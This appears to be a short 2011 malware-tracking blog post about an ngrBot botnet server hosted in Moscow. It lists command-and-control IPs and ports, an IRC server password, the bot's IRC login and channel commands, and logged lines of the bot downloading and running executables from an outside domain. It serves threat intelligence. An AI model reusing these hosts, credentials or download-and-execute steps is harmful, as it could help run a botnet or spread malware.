109.68.191.185(ngrBot hosted in Russian Federation Moscow Jsc Tel Company)

By Pig, October 27, 2011

Remote Host Port Number
109.68.191.185 7777 PASS laekin0505x
199.115.229.189 80
199.15.234.7 80

NICK n{US|XPa}lwndarv
USER lwndarv 0 0 :lwndarv
JOIN #totalrenovation2011 ngrBot
PRIVMSG #totalrenovation2011 :[d=”http://juazjuaz.com/cipha.exe” s=”114688 bytes”] Executed file “C:Documents and SettingsUserNameApplication Data1.exe” – Download retries: 0
PRIVMSG #totalrenovation2011 :[d=”http://juazjuaz.com/Winsoft.exe” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataMcxaxm.exe” – Download retries: 0

* The data identified by the following URLs was then requested from the remote web server:
o http://juazjuaz.com/cipha.exe
o http://juazjuaz.com/Winsoft.exe
o http://api.wipmania.com/

hosting infos:
http://whois.domaintools.com/109.68.191.185

Categories: Uncategorized

Previous postTrojan.Win32.Jorik.Zbot.vf(hosted in Lithuania Siauliai Splius Uab)

Next post69.162.69.2(ngrBot hosted in United States Pacoima Limestone Networks Inc)